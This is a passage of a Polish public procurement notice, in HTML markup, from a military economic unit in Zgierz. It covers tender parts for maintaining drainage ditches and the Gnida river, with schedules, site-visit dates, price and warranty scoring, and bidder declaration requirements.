Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rowów odwadniających z terenu 31 Wojskowego Oddziału Gospodarczego w Zgierzu <br/>i Jeżewa:<br/><br/>1.	Rów odpływowy z oczyszczalni ścieków poza teren kompleksu o długości 90 m, szerokości 2 m, głębokości 1,5 m – Zgierz<br/>- ręczne wykaszanie porostów traw na skarpach i dnie rowu,<br/>- oczyszczenie terenu z pozostałości po wykoszeniu i karczowaniu <br/>z wywiezieniem<br/>- odmulenie dna rowu i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu<br/>- odmulenie ręczne dna rowu przy braku dostępu pojazdów mechanicznych<br/> - po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy na całości rowów.<br/><br/>2.	Rów melioracyjny o długości 2000 m, szerokości 2 m, głębokości 1,5 m – kompleks Jeżewo<br/>- ręczne wykaszanie porostów traw na skarpach i dnie rowu<br/>- oczyszczenie terenu z pozostałości po wykoszeniu i karczowaniu <br/>z wywiezieniem<br/>- odmulenie dna rowu i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu<br/>- odmulenie ręczne dna rowu przy braku dostępu pojazdów mechanicznych<br/> - po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy <br/>na całości rowów.<br/><br/>Termin wykonania: 19.09.2022– 15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 27 lipca 2022 r. (środa) o godz. 10:00<br/>Teren 31 Wojskowego Oddziału Gospodarczego w Zgierzu i Jeżewie.<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rowu odpływowego z terenu Składu Regny:<br/><br/> 1. Rów odwadniający na terenie składu Regny o długości 3 km, szerokości 1,5m,<br/> głębokości 1,0m. <br/>- ręczne wykaszanie porostów traw wraz z karczowaniem samosiewów na skarpach i dnie rowu,<br/>- oczyszczenie terenu z pozostałości po wykoszeniu i karczowaniu <br/>z wywiezieniem<br/>- odmulenie dna rowu i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu<br/>- odmulenie ręczne dna rowu przy braku dostępu pojazdów mechanicznych<br/> Po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy <br/>na całości rowów.<br/><br/>Termin wykonania: 19.09.2022 – 15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 28 lipca 2022 r. (czwartek) o godz. 10:00<br/>Teren Skład Regny.<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rowów odwadniających z terenu Składu Kutno:<br/><br/>1.	Rowy odwadniające z terenu składu Kutno: <br/><br/>- rów o długości 3000 m <br/>2. Oczyszczenie i odmulenie przepustów na wyżej wymienionym rowie<br/>	- rów – 2 przepusty	<br/>3. Ręczne wykaszanie porostu traw na skarpach i dnach rowów.<br/>4.	Oczyszczenie terenu z pozostałości po wykoszeniu z wywiezieniem poza teren Składu<br/>5.	Odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych.<br/>6.	Zastosować środek chwastobójczy na całości rowów.<br/><br/> Termin wykonania: 19.09.2022 – 15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 26 lipca 2022 r. (wtorek) o godz. 12:00<br/>Teren Skład Kutno.<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rzeki Gnidy <br/>z terenu lotniska Leźnica Wielka:<br/>1.	Czyszczenie koryta Rzeki Gnidy na odcinku 120 m<br/>2.	Wykoszenie porostu traw skarp rzeki <br/>3.	Oczyszczenie terenu z pozostałości po wykoszeniu z wywiezieniem<br/>4.	Odmulenie dna rzeki i rozplantowanie wydobytego urobku wzdłuż wykopu.<br/>5.	Po wykoszeniu skarp i oczyszczeniu z mchu zastosować środek chwastobójczy na całości skarp rzeki.<br/><br/>Termin wykonania: 19.09.2022 – 15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 26 lipca 2022 r. (środa) o godz. 9:00<br/>Teren Lotniska Leźnica Wielka (konserwacja rzeki Gnidy).<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania <br/>o udzielenie zamówienia w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym:<br/><br/>•	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia, o którym mowa stanowi Załącznik Nr 4 do SWZ.<br/><br/>•	oświadczenie w celu potwierdzenia aktualności informacji przedstawionych w oświadczeniu, o którym mowa w art. 125 ust.1 w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub <br/>w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym zgodnie z załącznikiem nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczą,<br/>• wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>• ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo składa się, jako dokument elektroniczny opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym podpisem elektronicznym.<br/>W przypadku gdy pełnomocnictwo zostało wystawione, jako dokument<br/>w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem<br/>w postaci papierowej mogą dokonać mocodawcy lub notariusz.<br/>Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.<br/>Wykonawca jest zobowiązany wskazać części zamówienia, których<br/>wykonanie zamierza powierzyć podwykonawcom i podać firmy<br/>podwykonawców, o ile są już znane - Załącznik Nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczą,<br/>• wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>• ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo składa się, jako dokument elektroniczny opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym podpisem elektronicznym.<br/>W przypadku gdy pełnomocnictwo zostało wystawione, jako dokument<br/>w postaci papierowej, przekazuje się 